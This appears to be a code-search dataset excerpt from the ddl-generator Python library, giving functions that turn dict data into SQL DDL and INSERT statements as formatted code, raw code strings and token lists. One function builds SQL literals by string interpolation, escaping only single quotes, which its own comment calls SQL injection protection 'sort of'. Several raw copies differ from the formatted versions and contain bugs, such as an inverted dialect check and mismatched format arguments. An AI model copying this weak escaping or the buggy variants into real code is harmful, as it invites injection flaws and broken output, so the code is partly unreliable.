] | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/ddlgenerator.py#L292-L320 |
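
In the same hypothetical vein, the generated model code comes back as a string:

from ddlgenerator.ddlgenerator import Table

table = Table([{'id': 1, 'title': 'spam'}], table_name='skits')
print(table.sqlalchemy())  # imports, a metadata object, and the Table definition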

catherinedevlin/ddl-generator | ddlgenerator/ddlgenerator.py | Table._prep_datum | python | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/ddlgenerator.py#L360-L385

def _prep_datum(self, datum, dialect, col, needs_conversion):
    """Puts a value in proper format for a SQL string"""
    if datum is None or (needs_conversion and not str(datum).strip()):
        return 'NULL'
    pytype = self.columns[col]['pytype']
    if needs_conversion:
        if pytype == datetime.datetime:
            datum = dateutil.parser.parse(datum)
        elif pytype == bool:
            datum = th.coerce_to_specific(datum)
            if dialect.startswith('sqlite'):
                datum = 1 if datum else 0
        else:
            datum = pytype(str(datum))
    if isinstance(datum, datetime.datetime) or isinstance(datum, datetime.date):
        if dialect in self._datetime_format:
            return datum.strftime(self._datetime_format[dialect])
        else:
            return "'%s'" % datum
    elif hasattr(datum, 'lower'):
        # simple SQL injection protection, sort of... ?
        return "'%s'" % datum.replace("'", "''")
    else:
        return datum
"""Puts a value in proper format for a SQL string"""
if datum is None or (needs_conversion and not str(datum).strip()):
return 'NULL'
pytype = self.columns[col]['pytype']
if needs_conversion:
if pytype == datetime.datetime:
datum = dateutil.parser.parse(datum)
elif pytype == bool:
datum = th.coerce_to_specific(datum)
if dialect.startswith('sqlite'):
datum = 1 if datum else 0
else:
datum = pytype(str(datum))
if isinstance(datum, datetime.datetime) or isinstance(datum, datetime.date):
if dialect in self._datetime_format:
return datum.strftime(self._datetime_format[dialect])
else:
return "'%s'" % datum
elif hasattr(datum, 'lower'):
# simple SQL injection protection, sort of... ?
return "'%s'" % datum.replace("'", "''")
else:
return datum | [
"def",
"_prep_datum",
"(",
"self",
",",
"datum",
",",
"dialect",
",",
"col",
",",
"needs_conversion",
")",
":",
"if",
"datum",
"is",
"None",
"or",
"(",
"needs_conversion",
"and",
"not",
"str",
"(",
"datum",
")",
".",
"strip",
"(",
")",
")",
":",
"return",
"'NULL'",
"pytype",
"=",
"self",
".",
"columns",
"[",
"col",
"]",
"[",
"'pytype'",
"]",
"if",
"needs_conversion",
":",
"if",
"pytype",
"==",
"datetime",
".",
"datetime",
":",
"datum",
"=",
"dateutil",
".",
"parser",
".",
"parse",
"(",
"datum",
")",
"elif",
"pytype",
"==",
"bool",
":",
"datum",
"=",
"th",
".",
"coerce_to_specific",
"(",
"datum",
")",
"if",
"dialect",
".",
"startswith",
"(",
"'sqlite'",
")",
":",
"datum",
"=",
"1",
"if",
"datum",
"else",
"0",
"else",
":",
"datum",
"=",
"pytype",
"(",
"str",
"(",
"datum",
")",
")",
"if",
"isinstance",
"(",
"datum",
",",
"datetime",
".",
"datetime",
")",
"or",
"isinstance",
"(",
"datum",
",",
"datetime",
".",
"date",
")",
":",
"if",
"dialect",
"in",
"self",
".",
"_datetime_format",
":",
"return",
"datum",
".",
"strftime",
"(",
"self",
".",
"_datetime_format",
"[",
"dialect",
"]",
")",
"else",
":",
"return",
"\"'%s'\"",
"%",
"datum",
"elif",
"hasattr",
"(",
"datum",
",",
"'lower'",
")",
":",
"# simple SQL injection protection, sort of... ?",
"return",
"\"'%s'\"",
"%",
"datum",
".",
"replace",
"(",
"\"'\"",
",",
"\"''\"",
")",
"else",
":",
"return",
"datum"
] | Puts a value in proper format for a SQL string | [
"Puts",
"a",
"value",
"in",
"proper",
"format",
"for",
"a",
"SQL",
"string"
] | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/ddlgenerator.py#L360-L385 |
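
A sketch of the quoting behavior, written as expected input/output pairs; the Table instance and its inferred column types are hypothetical:

# Assuming a Table whose 'name' column coerced to str:
# table._prep_datum(None, 'postgresql', 'name', needs_conversion=False)
#     -> 'NULL'
# table._prep_datum("O'Toole", 'postgresql', 'name', needs_conversion=False)
#     -> "'O''Toole'"       (embedded single quotes doubled)
# For a datetime column, the value is parsed and rendered with the dialect's
# datetime format, or falls back to a plain quoted string.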

catherinedevlin/ddl-generator | ddlgenerator/ddlgenerator.py | Table.emit_db_sequence_updates | python | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/ddlgenerator.py#L389-L407

def emit_db_sequence_updates(self):
    """Set database sequence objects to match the source db

    Relevant only when generated from SQLAlchemy connection.
    Needed to avoid subsequent unique key violations after DB build."""
    if self.source.db_engine and self.source.db_engine.name == 'postgresql':
        # not implemented for other RDBMS; necessity unknown
        conn = self.source.db_engine.connect()
        # fetch, for each sequence, a last_value query and its qualified name
        qry = """SELECT 'SELECT last_value FROM ' || n.nspname ||
                        '.' || c.relname || ';' AS qry,
                        n.nspname || '.' || c.relname AS qual_name
                 FROM pg_namespace n
                 JOIN pg_class c ON (n.oid = c.relnamespace)
                 WHERE c.relkind = 'S'"""
        for (seq_qry, qual_name) in list(conn.execute(qry)):
            (lastval, ) = conn.execute(seq_qry).first()
            nextval = int(lastval) + 1
            yield "ALTER SEQUENCE %s RESTART WITH %s;" % (qual_name, nextval)
"""Set database sequence objects to match the source db
Relevant only when generated from SQLAlchemy connection.
Needed to avoid subsequent unique key violations after DB build."""
if self.source.db_engine and self.source.db_engine.name != 'postgresql':
# not implemented for other RDBMS; necessity unknown
conn = self.source.db_engine.connect()
qry = """SELECT 'SELECT last_value FROM ' || n.nspname || '.' || c.relname || ';'
FROM pg_namespace n
JOIN pg_class c ON (n.oid = c.relnamespace)
WHERE c.relkind = 'S'"""
result = []
for (sequence, ) in list(conn.execute(qry)):
qry = "SELECT last_value FROM %s" % sequence
(lastval, ) = conn.execute(qry).first()
nextval = int(lastval) + 1
yield "ALTER SEQUENCE %s RESTART WITH %s;" % nextval | [
"def",
"emit_db_sequence_updates",
"(",
"self",
")",
":",
"if",
"self",
".",
"source",
".",
"db_engine",
"and",
"self",
".",
"source",
".",
"db_engine",
".",
"name",
"!=",
"'postgresql'",
":",
"# not implemented for other RDBMS; necessity unknown",
"conn",
"=",
"self",
".",
"source",
".",
"db_engine",
".",
"connect",
"(",
")",
"qry",
"=",
"\"\"\"SELECT 'SELECT last_value FROM ' || n.nspname || '.' || c.relname || ';'\n FROM pg_namespace n\n JOIN pg_class c ON (n.oid = c.relnamespace)\n WHERE c.relkind = 'S'\"\"\"",
"result",
"=",
"[",
"]",
"for",
"(",
"sequence",
",",
")",
"in",
"list",
"(",
"conn",
".",
"execute",
"(",
"qry",
")",
")",
":",
"qry",
"=",
"\"SELECT last_value FROM %s\"",
"%",
"sequence",
"(",
"lastval",
",",
")",
"=",
"conn",
".",
"execute",
"(",
"qry",
")",
".",
"first",
"(",
")",
"nextval",
"=",
"int",
"(",
"lastval",
")",
"+",
"1",
"yield",
"\"ALTER SEQUENCE %s RESTART WITH %s;\"",
"%",
"nextval"
] | Set database sequence objects to match the source db
Relevant only when generated from SQLAlchemy connection.
Needed to avoid subsequent unique key violations after DB build. | [
"Set",
"database",
"sequence",
"objects",
"to",
"match",
"the",
"source",
"db"
] | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/ddlgenerator.py#L389-L407 |

catherinedevlin/ddl-generator | ddlgenerator/ddlgenerator.py | Table.sql | python | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/ddlgenerator.py#L436-L446

def sql(self, dialect=None, inserts=False, creates=True,
        drops=True, metadata_source=None):
    """
    Combined results of ``.ddl(dialect)`` and, if ``inserts==True``,
    ``.inserts(dialect)``.
    """
    result = [self.ddl(dialect, creates=creates, drops=drops)]
    if inserts:
        for row in self.inserts(dialect):
            result.append(row)
    return '\n'.join(result)
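
A brief sketch combining DDL and INSERTs, with the same kind of hypothetical data as above:

from ddlgenerator.ddlgenerator import Table

table = Table([{'sku': 'A1', 'qty': 3}], table_name='inventory')
print(table.sql(dialect='sqlite', inserts=True))  # DROP + CREATE + INSERT statements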

catherinedevlin/ddl-generator | ddlgenerator/reshape.py | clean_key_name | python | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/reshape.py#L18-L34

def clean_key_name(key):
    """
    Makes ``key`` a valid and appropriate SQL column name:

    1. Replaces illegal characters in column names with ``_``

    2. Prevents name from beginning with a digit (prepends ``_``)

    3. Lowercases name.  If you want case-sensitive table
       or column names, you are a bad person and you should feel bad.
    """
    result = _illegal_in_column_name.sub("_", key.strip())
    if result[0].isdigit():
        result = '_%s' % result
    if result.upper() in sql_reserved_words:
        result = '_%s' % result  # prefix the cleaned name, not the raw key
    return result.lower()
"""
Makes ``key`` a valid and appropriate SQL column name:
1. Replaces illegal characters in column names with ``_``
2. Prevents name from beginning with a digit (prepends ``_``)
3. Lowercases name. If you want case-sensitive table
or column names, you are a bad person and you should feel bad.
"""
result = _illegal_in_column_name.sub("_", key.strip())
if result[0].isdigit():
result = '_%s' % result
if result.upper() in sql_reserved_words:
result = '_%s' % key
return result.lower() | [
"def",
"clean_key_name",
"(",
"key",
")",
":",
"result",
"=",
"_illegal_in_column_name",
".",
"sub",
"(",
"\"_\"",
",",
"key",
".",
"strip",
"(",
")",
")",
"if",
"result",
"[",
"0",
"]",
".",
"isdigit",
"(",
")",
":",
"result",
"=",
"'_%s'",
"%",
"result",
"if",
"result",
".",
"upper",
"(",
")",
"in",
"sql_reserved_words",
":",
"result",
"=",
"'_%s'",
"%",
"key",
"return",
"result",
".",
"lower",
"(",
")"
] | Makes ``key`` a valid and appropriate SQL column name:
1. Replaces illegal characters in column names with ``_``
2. Prevents name from beginning with a digit (prepends ``_``)
3. Lowercases name. If you want case-sensitive table
or column names, you are a bad person and you should feel bad. | [
"Makes",
"key",
"a",
"valid",
"and",
"appropriate",
"SQL",
"column",
"name",
":"
] | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/reshape.py#L18-L34 |

catherinedevlin/ddl-generator | ddlgenerator/reshape.py | walk_and_clean | python | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/reshape.py#L36-L67

def walk_and_clean(data):
    """
    Recursively walks list of dicts (which may themselves embed lists and dicts),
    transforming namedtuples to OrderedDicts and
    using ``clean_key_name(k)`` to make keys into SQL-safe column names

    >>> data = [{'a': 1}, [{'B': 2}, {'B': 3}], {'F': {'G': 4}}]
    >>> pprint(walk_and_clean(data))
    [OrderedDict([('a', 1)]),
     [OrderedDict([('b', 2)]), OrderedDict([('b', 3)])],
     OrderedDict([('f', OrderedDict([('g', 4)]))])]
    """
    # transform namedtuples to OrderedDicts
    if hasattr(data, '_fields'):
        data = OrderedDict((k, v) for (k, v) in zip(data._fields, data))
    # Recursively clean up child dicts and lists
    if hasattr(data, 'items') and hasattr(data, '__setitem__'):
        for (key, val) in data.items():
            data[key] = walk_and_clean(val)
    elif isinstance(data, list) or isinstance(data, tuple) \
            or hasattr(data, '__next__') or hasattr(data, 'next'):
        data = [walk_and_clean(d) for d in data]
    # Clean up any keys in this dict itself
    if hasattr(data, 'items'):
        original_keys = data.keys()
        tup = ((clean_key_name(k), v) for (k, v) in data.items())
        data = OrderedDict(tup)
        if len(data) < len(original_keys):
            raise KeyError('Cleaning up %s created duplicates' %
                           original_keys)
    return data
"""
Recursively walks list of dicts (which may themselves embed lists and dicts),
transforming namedtuples to OrderedDicts and
using ``clean_key_name(k)`` to make keys into SQL-safe column names
>>> data = [{'a': 1}, [{'B': 2}, {'B': 3}], {'F': {'G': 4}}]
>>> pprint(walk_and_clean(data))
[OrderedDict([('a', 1)]),
[OrderedDict([('b', 2)]), OrderedDict([('b', 3)])],
OrderedDict([('f', OrderedDict([('g', 4)]))])]
"""
# transform namedtuples to OrderedDicts
if hasattr(data, '_fields'):
data = OrderedDict((k,v) for (k,v) in zip(data._fields, data))
# Recursively clean up child dicts and lists
if hasattr(data, 'items') and hasattr(data, '__setitem__'):
for (key, val) in data.items():
data[key] = walk_and_clean(val)
elif isinstance(data, list) or isinstance(data, tuple) \
or hasattr(data, '__next__') or hasattr(data, 'next'):
data = [walk_and_clean(d) for d in data]
# Clean up any keys in this dict itself
if hasattr(data, 'items'):
original_keys = data.keys()
tup = ((clean_key_name(k), v) for (k, v) in data.items())
data = OrderedDict(tup)
if len(data) < len(original_keys):
raise KeyError('Cleaning up %s created duplicates' %
original_keys)
return data | [
"def",
"walk_and_clean",
"(",
"data",
")",
":",
"# transform namedtuples to OrderedDicts",
"if",
"hasattr",
"(",
"data",
",",
"'_fields'",
")",
":",
"data",
"=",
"OrderedDict",
"(",
"(",
"k",
",",
"v",
")",
"for",
"(",
"k",
",",
"v",
")",
"in",
"zip",
"(",
"data",
".",
"_fields",
",",
"data",
")",
")",
"# Recursively clean up child dicts and lists",
"if",
"hasattr",
"(",
"data",
",",
"'items'",
")",
"and",
"hasattr",
"(",
"data",
",",
"'__setitem__'",
")",
":",
"for",
"(",
"key",
",",
"val",
")",
"in",
"data",
".",
"items",
"(",
")",
":",
"data",
"[",
"key",
"]",
"=",
"walk_and_clean",
"(",
"val",
")",
"elif",
"isinstance",
"(",
"data",
",",
"list",
")",
"or",
"isinstance",
"(",
"data",
",",
"tuple",
")",
"or",
"hasattr",
"(",
"data",
",",
"'__next__'",
")",
"or",
"hasattr",
"(",
"data",
",",
"'next'",
")",
":",
"data",
"=",
"[",
"walk_and_clean",
"(",
"d",
")",
"for",
"d",
"in",
"data",
"]",
"# Clean up any keys in this dict itself",
"if",
"hasattr",
"(",
"data",
",",
"'items'",
")",
":",
"original_keys",
"=",
"data",
".",
"keys",
"(",
")",
"tup",
"=",
"(",
"(",
"clean_key_name",
"(",
"k",
")",
",",
"v",
")",
"for",
"(",
"k",
",",
"v",
")",
"in",
"data",
".",
"items",
"(",
")",
")",
"data",
"=",
"OrderedDict",
"(",
"tup",
")",
"if",
"len",
"(",
"data",
")",
"<",
"len",
"(",
"original_keys",
")",
":",
"raise",
"KeyError",
"(",
"'Cleaning up %s created duplicates'",
"%",
"original_keys",
")",
"return",
"data"
] | Recursively walks list of dicts (which may themselves embed lists and dicts),
transforming namedtuples to OrderedDicts and
using ``clean_key_name(k)`` to make keys into SQL-safe column names
>>> data = [{'a': 1}, [{'B': 2}, {'B': 3}], {'F': {'G': 4}}]
>>> pprint(walk_and_clean(data))
[OrderedDict([('a', 1)]),
[OrderedDict([('b', 2)]), OrderedDict([('b', 3)])],
OrderedDict([('f', OrderedDict([('g', 4)]))])] | [
"Recursively",
"walks",
"list",
"of",
"dicts",
"(",
"which",
"may",
"themselves",
"embed",
"lists",
"and",
"dicts",
")",
"transforming",
"namedtuples",
"to",
"OrderedDicts",
"and",
"using",
"clean_key_name",
"(",
"k",
")",
"to",
"make",
"keys",
"into",
"SQL",
"-",
"safe",
"column",
"names"
] | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/reshape.py#L36-L67 |

catherinedevlin/ddl-generator | ddlgenerator/reshape.py | _id_fieldname | python | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/reshape.py#L69-L83

def _id_fieldname(fieldnames, table_name=''):
    """
    Finds the field name from a dict likeliest to be its unique ID

    >>> _id_fieldname({'bar': True, 'id': 1}, 'foo')
    'id'
    >>> _id_fieldname({'bar': True, 'foo_id': 1, 'goo_id': 2}, 'foo')
    'foo_id'
    >>> _id_fieldname({'bar': True, 'baz': 1, 'baz_id': 3}, 'foo')
    """
    templates = ['%s_%%s' % table_name, '%s', '_%s']
    for stub in ['id', 'num', 'no', 'number']:
        for t in templates:
            if t % stub in fieldnames:
                return t % stub
"""
Finds the field name from a dict likeliest to be its unique ID
>>> _id_fieldname({'bar': True, 'id': 1}, 'foo')
'id'
>>> _id_fieldname({'bar': True, 'foo_id': 1, 'goo_id': 2}, 'foo')
'foo_id'
>>> _id_fieldname({'bar': True, 'baz': 1, 'baz_id': 3}, 'foo')
"""
templates = ['%s_%%s' % table_name, '%s', '_%s']
for stub in ['id', 'num', 'no', 'number']:
for t in templates:
if t % stub in fieldnames:
return t % stub | [
"def",
"_id_fieldname",
"(",
"fieldnames",
",",
"table_name",
"=",
"''",
")",
":",
"templates",
"=",
"[",
"'%s_%%s'",
"%",
"table_name",
",",
"'%s'",
",",
"'_%s'",
"]",
"for",
"stub",
"in",
"[",
"'id'",
",",
"'num'",
",",
"'no'",
",",
"'number'",
"]",
":",
"for",
"t",
"in",
"templates",
":",
"if",
"t",
"%",
"stub",
"in",
"fieldnames",
":",
"return",
"t",
"%",
"stub"
] | Finds the field name from a dict likeliest to be its unique ID
>>> _id_fieldname({'bar': True, 'id': 1}, 'foo')
'id'
>>> _id_fieldname({'bar': True, 'foo_id': 1, 'goo_id': 2}, 'foo')
'foo_id'
>>> _id_fieldname({'bar': True, 'baz': 1, 'baz_id': 3}, 'foo') | [
"Finds",
"the",
"field",
"name",
"from",
"a",
"dict",
"likeliest",
"to",
"be",
"its",
"unique",
"ID"
] | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/reshape.py#L69-L83 |

catherinedevlin/ddl-generator | ddlgenerator/reshape.py | unnest_child_dict | python | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/reshape.py#L113-L165

def unnest_child_dict(parent, key, parent_name=''):
    """
    If ``parent`` dictionary has a ``key`` whose ``val`` is a dict,
    unnest ``val``'s fields into ``parent`` and remove ``key``.

    >>> parent = {'province': 'Québec', 'capital': {'name': 'Québec City', 'pop': 491140}}
    >>> unnest_child_dict(parent, 'capital', 'provinces')
    >>> pprint(parent)
    {'capital_name': 'Québec City', 'capital_pop': 491140, 'province': 'Québec'}

    >>> parent = {'province': 'Québec', 'capital': {'id': 1, 'name': 'Québec City', 'pop': 491140}}
    >>> unnest_child_dict(parent, 'capital', 'provinces')
    >>> pprint(parent)
    {'capital_id': 1,
     'capital_name': 'Québec City',
     'capital_pop': 491140,
     'province': 'Québec'}

    >>> parent = {'province': 'Québec', 'capital': {'id': 1, 'name': 'Québec City'}}
    >>> unnest_child_dict(parent, 'capital', 'provinces')
    >>> pprint(parent)
    {'capital': 'Québec City', 'province': 'Québec'}
    """
    val = parent[key]
    name = "%s['%s']" % (parent_name, key)
    logging.debug("Unnesting dict %s" % name)
    id = _id_fieldname(val, parent_name)
    if id:
        logging.debug("%s is %s's ID" % (id, key))
        if len(val) <= 2:
            logging.debug('Removing ID column %s.%s' % (key, id))
            val.pop(id)
    if len(val) == 0:
        logging.debug('%s is empty, removing from %s' % (name, parent_name))
        parent.pop(key)
        return
    elif len(val) == 1:
        logging.debug('Nested one-item dict in %s, making scalar.' % name)
        parent[key] = list(val.values())[0]
        return
    else:
        logging.debug('Pushing all fields from %s up to %s' % (name, parent_name))
        new_field_names = ['%s_%s' % (key, child_key.strip('_')) for child_key in val]
        overlap = (set(new_field_names) & set(parent)) - ({id} if id else set())
        if overlap:
            logging.error("Could not unnest child %s; %s present in %s"
                          % (name, ','.join(overlap), parent_name))
            return
        for (child_key, child_val) in val.items():
            new_field_name = '%s_%s' % (key, child_key.strip('_'))
            parent[new_field_name] = child_val
        parent.pop(key)
"""
If ``parent`` dictionary has a ``key`` whose ``val`` is a dict,
unnest ``val``'s fields into ``parent`` and remove ``key``.
>>> parent = {'province': 'Québec', 'capital': {'name': 'Québec City', 'pop': 491140}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital_name': 'Québec City', 'capital_pop': 491140, 'province': 'Québec'}
>>> parent = {'province': 'Québec', 'capital': {'id': 1, 'name': 'Québec City', 'pop': 491140}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital_id': 1,
'capital_name': 'Québec City',
'capital_pop': 491140,
'province': 'Québec'}
>>> parent = {'province': 'Québec', 'capital': {'id': 1, 'name': 'Québec City'}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital': 'Québec City', 'province': 'Québec'}
"""
val = parent[key]
name = "%s['%s']" % (parent_name, key)
logging.debug("Unnesting dict %s" % name)
id = _id_fieldname(val, parent_name)
if id:
logging.debug("%s is %s's ID" % (id, key))
if len(val) <= 2:
logging.debug('Removing ID column %s.%s' % (key, id))
val.pop(id)
if len(val) == 0:
logging.debug('%s is empty, removing from %s' % (name, parent_name))
parent.pop(key)
return
elif len(val) == 1:
logging.debug('Nested one-item dict in %s, making scalar.' % name)
parent[key] = list(val.values())[0]
return
else:
logging.debug('Pushing all fields from %s up to %s' % (name, parent_name))
new_field_names = ['%s_%s' % (key, child_key.strip('_')) for child_key in val]
overlap = (set(new_field_names) & set(parent)) - set(id or [])
if overlap:
logging.error("Could not unnest child %s; %s present in %s"
% (name, key, ','.join(overlap), parent_name))
return
for (child_key, child_val) in val.items():
new_field_name = '%s_%s' % (key, child_key.strip('_'))
parent[new_field_name] = child_val
parent.pop(key) | [
"def",
"unnest_child_dict",
"(",
"parent",
",",
"key",
",",
"parent_name",
"=",
"''",
")",
":",
"val",
"=",
"parent",
"[",
"key",
"]",
"name",
"=",
"\"%s['%s']\"",
"%",
"(",
"parent_name",
",",
"key",
")",
"logging",
".",
"debug",
"(",
"\"Unnesting dict %s\"",
"%",
"name",
")",
"id",
"=",
"_id_fieldname",
"(",
"val",
",",
"parent_name",
")",
"if",
"id",
":",
"logging",
".",
"debug",
"(",
"\"%s is %s's ID\"",
"%",
"(",
"id",
",",
"key",
")",
")",
"if",
"len",
"(",
"val",
")",
"<=",
"2",
":",
"logging",
".",
"debug",
"(",
"'Removing ID column %s.%s'",
"%",
"(",
"key",
",",
"id",
")",
")",
"val",
".",
"pop",
"(",
"id",
")",
"if",
"len",
"(",
"val",
")",
"==",
"0",
":",
"logging",
".",
"debug",
"(",
"'%s is empty, removing from %s'",
"%",
"(",
"name",
",",
"parent_name",
")",
")",
"parent",
".",
"pop",
"(",
"key",
")",
"return",
"elif",
"len",
"(",
"val",
")",
"==",
"1",
":",
"logging",
".",
"debug",
"(",
"'Nested one-item dict in %s, making scalar.'",
"%",
"name",
")",
"parent",
"[",
"key",
"]",
"=",
"list",
"(",
"val",
".",
"values",
"(",
")",
")",
"[",
"0",
"]",
"return",
"else",
":",
"logging",
".",
"debug",
"(",
"'Pushing all fields from %s up to %s'",
"%",
"(",
"name",
",",
"parent_name",
")",
")",
"new_field_names",
"=",
"[",
"'%s_%s'",
"%",
"(",
"key",
",",
"child_key",
".",
"strip",
"(",
"'_'",
")",
")",
"for",
"child_key",
"in",
"val",
"]",
"overlap",
"=",
"(",
"set",
"(",
"new_field_names",
")",
"&",
"set",
"(",
"parent",
")",
")",
"-",
"set",
"(",
"id",
"or",
"[",
"]",
")",
"if",
"overlap",
":",
"logging",
".",
"error",
"(",
"\"Could not unnest child %s; %s present in %s\"",
"%",
"(",
"name",
",",
"key",
",",
"','",
".",
"join",
"(",
"overlap",
")",
",",
"parent_name",
")",
")",
"return",
"for",
"(",
"child_key",
",",
"child_val",
")",
"in",
"val",
".",
"items",
"(",
")",
":",
"new_field_name",
"=",
"'%s_%s'",
"%",
"(",
"key",
",",
"child_key",
".",
"strip",
"(",
"'_'",
")",
")",
"parent",
"[",
"new_field_name",
"]",
"=",
"child_val",
"parent",
".",
"pop",
"(",
"key",
")"
] | If ``parent`` dictionary has a ``key`` whose ``val`` is a dict,
unnest ``val``'s fields into ``parent`` and remove ``key``.
>>> parent = {'province': 'Québec', 'capital': {'name': 'Québec City', 'pop': 491140}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital_name': 'Québec City', 'capital_pop': 491140, 'province': 'Québec'}
>>> parent = {'province': 'Québec', 'capital': {'id': 1, 'name': 'Québec City', 'pop': 491140}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital_id': 1,
'capital_name': 'Québec City',
'capital_pop': 491140,
'province': 'Québec'}
>>> parent = {'province': 'Québec', 'capital': {'id': 1, 'name': 'Québec City'}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital': 'Québec City', 'province': 'Québec'} | [
"If",
"parent",
"dictionary",
"has",
"a",
"key",
"whose",
"val",
"is",
"a",
"dict",
"unnest",
"val",
"s",
"fields",
"into",
"parent",
"and",
"remove",
"key",
"."
] | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/reshape.py#L113-L165 |

catherinedevlin/ddl-generator | ddlgenerator/reshape.py | unnest_children | python | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/reshape.py#L263-L318

def unnest_children(data, parent_name='', pk_name=None, force_pk=False):
    """
    For each ``key`` in each row of ``data`` (which must be a list of dicts),
    unnest any dict values into ``parent``, and remove list values into separate lists.

    Return (``data``, ``pk_name``, ``children``, ``child_fk_names``) where

    ``data``
        the transformed input list

    ``pk_name``
        field name of ``data``'s (possibly new) primary key

    ``children``
        a defaultdict(list) of data extracted from child lists

    ``child_fk_names``
        dict of the foreign key field name in each child
    """
    possible_fk_names = ['%s_id' % parent_name, '_%s_id' % parent_name, 'parent_id', ]
    if pk_name:
        possible_fk_names.insert(0, '%s_%s' % (parent_name, pk_name.strip('_')))
    children = defaultdict(list)
    field_names_used_by_children = defaultdict(set)
    child_fk_names = {}
    parent = ParentTable(data, parent_name, pk_name=pk_name, force_pk=force_pk)
    for row in parent:
        try:
            # snapshot items(): unnest_child_dict mutates row during the scan
            for (key, val) in list(row.items()):
                if hasattr(val, 'items'):
                    unnest_child_dict(parent=row, key=key, parent_name=parent_name)
                elif isinstance(val, list) or isinstance(val, tuple):
                    # force listed items to be dicts, not scalars
                    row[key] = [v if hasattr(v, 'items') else {key: v} for v in val]
        except AttributeError:
            raise TypeError('Each row should be a dictionary, got %s: %s' % (type(row), row))
        for (key, val) in row.items():
            if isinstance(val, list) or isinstance(val, tuple):
                for child in val:
                    field_names_used_by_children[key].update(set(child.keys()))
    for (child_name, names_in_use) in field_names_used_by_children.items():
        if not parent.pk:
            parent.assign_pk()
        for fk_name in possible_fk_names:
            if fk_name not in names_in_use:
                break
        else:
            raise Exception("Cannot find unused field name in %s.%s to use as foreign key"
                            % (parent_name, child_name))
        child_fk_names[child_name] = fk_name
        for row in parent:
            if child_name in row:
                for child in row[child_name]:
                    child[fk_name] = row[parent.pk.name]
                    children[child_name].append(child)
                row.pop(child_name)
    # TODO: What if rows have a mix of scalar / list / dict types?
    return (parent, parent.pk.name if parent.pk else None, children, child_fk_names)
"""
For each ``key`` in each row of ``data`` (which must be a list of dicts),
unnest any dict values into ``parent``, and remove list values into separate lists.
Return (``data``, ``pk_name``, ``children``, ``child_fk_names``) where
``data``
the transformed input list
``pk_name``
field name of ``data``'s (possibly new) primary key
``children``
a defaultdict(list) of data extracted from child lists
``child_fk_names``
dict of the foreign key field name in each child
"""
possible_fk_names = ['%s_id' % parent_name, '_%s_id' % parent_name, 'parent_id', ]
if pk_name:
possible_fk_names.insert(0, '%s_%s' % (parent_name, pk_name.strip('_')))
children = defaultdict(list)
field_names_used_by_children = defaultdict(set)
child_fk_names = {}
parent = ParentTable(data, parent_name, pk_name=pk_name, force_pk=force_pk)
for row in parent:
try:
for (key, val) in row.items():
if hasattr(val, 'items'):
unnest_child_dict(parent=row, key=key, parent_name=parent_name)
elif isinstance(val, list) or isinstance(val, tuple):
# force listed items to be dicts, not scalars
row[key] = [v if hasattr(v, 'items') else {key: v} for v in val]
except AttributeError:
raise TypeError('Each row should be a dictionary, got %s: %s' % (type(row), row))
for (key, val) in row.items():
if isinstance(val, list) or isinstance(val, tuple):
for child in val:
field_names_used_by_children[key].update(set(child.keys()))
for (child_name, names_in_use) in field_names_used_by_children.items():
if not parent.pk:
parent.assign_pk()
for fk_name in possible_fk_names:
if fk_name not in names_in_use:
break
else:
raise Exception("Cannot find unused field name in %s.%s to use as foreign key"
% (parent_name, child_name))
child_fk_names[child_name] = fk_name
for row in parent:
if child_name in row:
for child in row[child_name]:
child[fk_name] = row[parent.pk.name]
children[child_name].append(child)
row.pop(child_name)
# TODO: What if rows have a mix of scalar / list / dict types?
return (parent, parent.pk.name if parent.pk else None, children, child_fk_names) | [
"def",
"unnest_children",
"(",
"data",
",",
"parent_name",
"=",
"''",
",",
"pk_name",
"=",
"None",
",",
"force_pk",
"=",
"False",
")",
":",
"possible_fk_names",
"=",
"[",
"'%s_id'",
"%",
"parent_name",
",",
"'_%s_id'",
"%",
"parent_name",
",",
"'parent_id'",
",",
"]",
"if",
"pk_name",
":",
"possible_fk_names",
".",
"insert",
"(",
"0",
",",
"'%s_%s'",
"%",
"(",
"parent_name",
",",
"pk_name",
".",
"strip",
"(",
"'_'",
")",
")",
")",
"children",
"=",
"defaultdict",
"(",
"list",
")",
"field_names_used_by_children",
"=",
"defaultdict",
"(",
"set",
")",
"child_fk_names",
"=",
"{",
"}",
"parent",
"=",
"ParentTable",
"(",
"data",
",",
"parent_name",
",",
"pk_name",
"=",
"pk_name",
",",
"force_pk",
"=",
"force_pk",
")",
"for",
"row",
